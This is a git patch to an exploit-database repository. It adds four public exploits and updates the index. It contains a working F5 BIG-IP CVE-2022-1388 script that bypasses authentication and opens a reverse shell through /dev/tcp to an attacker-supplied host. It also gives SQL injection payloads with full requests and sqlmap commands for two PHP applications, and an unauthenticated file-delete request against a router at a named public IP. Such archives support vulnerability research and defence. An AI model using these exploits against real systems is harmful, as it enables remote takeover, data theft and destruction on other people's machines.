From 6b9b8c54349b1a511ed9458f05f74dd2ac23ad5b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 13 May 2022 05:01:39 +0000 Subject: [PATCH] DB: 2022-05-13 7 changes to exploits/shellcodes Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE) F5 BIG-IP 16.0.x - Remote Code Execution (RCE) College Management System 1.0 - 'course_code' SQL Injection (Authenticated) Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) TLR-2005KSH - Arbitrary File Delete --- exploits/hardware/webapps/50935.txt | 21 +++++++ exploits/multiple/remote/50932.py | 66 +++++++++++++++++++++ exploits/php/webapps/50933.txt | 54 +++++++++++++++++ exploits/php/webapps/50934.txt | 66 +++++++++++++++++++++ exploits/windows/{local => remote}/50913.py | 2 +- files_exploits.csv | 6 +- 6 files changed, 213 insertions(+), 2 deletions(-) create mode 100644 exploits/hardware/webapps/50935.txt create mode 100755 exploits/multiple/remote/50932.py create mode 100644 exploits/php/webapps/50933.txt create mode 100644 exploits/php/webapps/50934.txt rename exploits/windows/{local => remote}/50913.py (94%) diff --git a/exploits/hardware/webapps/50935.txt b/exploits/hardware/webapps/50935.txt new file mode 100644 index 000000000..bb2d708ad --- /dev/null +++ b/exploits/hardware/webapps/50935.txt @@ -0,0 +1,21 @@ +# Exploit Title: TLR-2005KSH - Arbitrary File Delete +# Date: 2022-05-11 +# Exploit Author: Ahmed Alroky +# Author Company : AIactive +# Version: 1.0.0 +# Vendor home page : http://telesquare.co.kr/ +# Authentication Required: No +# Tested on: Windows +# CVE: CVE-2021-46424 + +# Proof-of-Concept +# Request + +DELETE /cgi-bin/test2.txt HTTP/1.1 +Host: 220.89.223.215:8083 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close \ No newline at end of file diff --git a/exploits/multiple/remote/50932.py b/exploits/multiple/remote/50932.py new file mode 100755 index 000000000..a70621fc7 --- /dev/null +++ b/exploits/multiple/remote/50932.py @@ -0,0 +1,66 @@ +# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) +# Exploit Author: Yesith Alvarez +# Vendor Homepage: https://www.f5.com/products/big-ip-services +# Version: 16.0.x +# CVE : CVE-2022-1388 + +from requests import Request, Session +import sys +import json + + + +def title(): + print(''' + + _______ ________ ___ ___ ___ ___ __ ____ ___ ___ + / ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ + | | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | + | | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < + | |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | + \_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/ + + + +Author: Yesith Alvarez +Github: https://github.com/yealvarez +Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ + ''') + +def exploit(url, lhost, lport): + url = url + 'mgmt/tm/util/bash' + data = { + "command":"run", + "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'" + + } + headers = { + 'Authorization': 'Basic YWRtaW46', + 'Connection':'keep-alive, X-F5-Auth-Token', + 'X-F5-Auth-Token': '0' + + } + s = Session() + req = Request('POST', url, json=data, headers=headers) + prepped = req.prepare() + del prepped.headers['Content-Type'] + resp = s.send(prepped, + verify=False, + timeout=15 + ) + #print(prepped.headers) + #print(url) + #print(resp.headers) + #print(resp.json()) + print(resp.status_code) + + +if __name__ == '__main__': + title() + if(len(sys.argv) < 4): + print('[+] USAGE: python3 %s https:// lhost lport\n'%(sys.argv[0])) + print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0])) + print('[+] Do not forget to run the listener: nc -lvp 4444\n') + exit(0) + else: + exploit(sys.argv[1],sys.argv[2],sys.argv[3]) \ No newline at end of file diff --git a/exploits/php/webapps/50933.txt b/exploits/php/webapps/50933.txt new file mode 100644 index 000000000..334ef27cb --- /dev/null +++ b/exploits/php/webapps/50933.txt @@ -0,0 +1,54 @@ +# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated) +# Date: 2022-24-03 +# Exploit Author: Eren Gozaydin +# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/ +# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f +# Version: 1.0 +# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 +# CVE: CVE-2022-28079 +# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079 + +------------------------------------------------------------------------------------ + +1. Description: +---------------------- + +College Management System 1.0 allows SQL Injection via parameter 'course_code' in +/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise +the application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + + +2. Proof of Concept: +---------------------- + +In Burpsuite intercept the request from the affected page with +'course_code' parameter and save it like poc.txt Then run SQLmap to extract the +data from the database: + +sqlmap -r poc.txt --dbms=mysql + + +3. Example payload: +---------------------- + +boolean-based blind +Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ + + +4. Burpsuite request: +---------------------- + +POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1 +Host: localhost +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-us,en;q=0.5 +Cache-Control: no-cache +Content-Length: 80 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe +Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php +User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + +submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns \ No newline at end of file diff --git a/exploits/php/webapps/50934.txt b/exploits/php/webapps/50934.txt new file mode 100644 index 000000000..7fef92795 --- /dev/null +++ b/exploits/php/webapps/50934.txt @@ -0,0 +1,66 @@ +# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) +# Date: 2022-26-03 +# Exploit Author: Eren Gozaydin +# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip +# Version: 1.0 +# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 +# CVE: CVE-2022-28080 +# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + +------------------------------------------------------------------------------------ + +1. Description: +---------------------- + +Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in +/royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise +the application, access or modify data, or exploit latent vulnerabilities +in the underlying database. + + +2. Proof of Concept: +---------------------- + +In Burpsuite intercept the request from the affected page with +'todate' parameter and save it like poc.txt. Then run SQLmap to extract the +data from the database: + +sqlmap -r poc.txt --dbms=mysql + + +3. Example payload: +---------------------- + +(boolean-based) + +-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns + +4. Burpsuite request: +---------------------- + +POST /royal_event/btndates_report.php#?= HTTP/1.1 +Host: localhost +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-us,en;q=0.5 +Cache-Control: no-cache +Content-Length: 334 +Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 +Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 +Referer: http://localhost/royal_event/btndates_report.php#?= +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + +--f289a6438bcc45179bcd3eb7ddc555d0 +Content-Disposition: form-data; name="todate" + +-1' OR 1=1 OR 'ns'='ns +--f289a6438bcc45179bcd3eb7ddc555d0 +Content-Disposition: form-data; name="search" + +3 +--f289a6438bcc45179bcd3eb7ddc555d0 +Content-Disposition: form-data; name="fromdate" + +01/01/2011 +--f289a6438bcc45179bcd3eb7ddc555d0-- \ No newline at end of file diff --git a/exploits/windows/local/50913.py b/exploits/windows/remote/50913.py similarity index 94% rename from exploits/windows/local/50913.py rename to exploits/windows/remote/50913.py index 1c6f6464d..cb171d2f0 100755 --- a/exploits/windows/local/50913.py +++ b/exploits/windows/remote/50913.py @@ -1,4 +1,4 @@ -# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) +# Exploit Title: Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE) # Date: 4/27/2022 # Exploit Author: Netanel Cohen & Tomer Peled # Vendor Homepage: https://drfone.wondershare.net/ diff --git a/files_exploits.csv b/files_exploits.csv index c57f9b09d..979bcefd8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11486,7 +11486,6 @@ id,file,description,date,author,type,platform,port 50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",1970-01-01,AkuCyberSec,local,windows, 50911,exploits/linux/local/50911.py,"ExifTool 12.23 - Arbitrary Code Execution",1970-01-01,UNICORD,local,linux, 50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",1970-01-01,"Netanel Cohen",local,windows, -50913,exploits/windows/local/50913.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)",1970-01-01,"Netanel Cohen",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18688,6 +18687,8 @@ id,file,description,date,author,type,platform,port 50904,exploits/windows/remote/50904.py,"ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure",1970-01-01,"Metin Yunus Kandemir",remote,windows, 50906,exploits/hardware/remote/50906.txt,"DLINK DIR850 - Insecure Access Control",1970-01-01,"Ahmed Alroky",remote,hardware, 50907,exploits/hardware/remote/50907.txt,"DLINK DIR850 - Open Redirect",1970-01-01,"Ahmed Alroky",remote,hardware, +50913,exploits/windows/remote/50913.py,"Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)",1970-01-01,"Netanel Cohen",remote,windows, +50932,exploits/multiple/remote/50932.py,"F5 BIG-IP 16.0.x - Remote Code Execution (RCE)",1970-01-01,"Yesith Alvarez",remote,multiple, 50914,exploits/linux/remote/50914.py,"Apache CouchDB 3.2.1 - Remote Code Execution (RCE)",1970-01-01,"Konstantin Burov",remote,linux, 50916,exploits/hardware/remote/50916.txt,"Tenda HG6 v3.3.0 - Remote Command Injection",1970-01-01,LiquidWorm,remote,hardware, 50917,exploits/multiple/remote/50917.js,"Google Chrome 78.0.3904.70 - Remote Code Execution",1970-01-01,"Forrest Orr",remote,multiple, @@ -44994,3 +44995,6 @@ id,file,description,date,author,type,platform,port 50925,exploits/php/webapps/50925.html,"WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Abisheik M",webapps,php, 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",1970-01-01,"Wolfgang Hotwagner",webapps,php, 50928,exploits/php/webapps/50928.txt,"WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)",1970-01-01,"Hassan Khan Yusufzai",webapps,php, +50933,exploits/php/webapps/50933.txt,"College Management System 1.0 - 'course_code' SQL Injection (Authenticated)",1970-01-01,"Eren Gozaydin",webapps,php, +50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",1970-01-01,"Eren Gozaydin",webapps,php, +50935,exploits/hardware/webapps/50935.txt,"TLR-2005KSH - Arbitrary File Delete",1970-01-01,"Ahmed Alroky",webapps,hardware,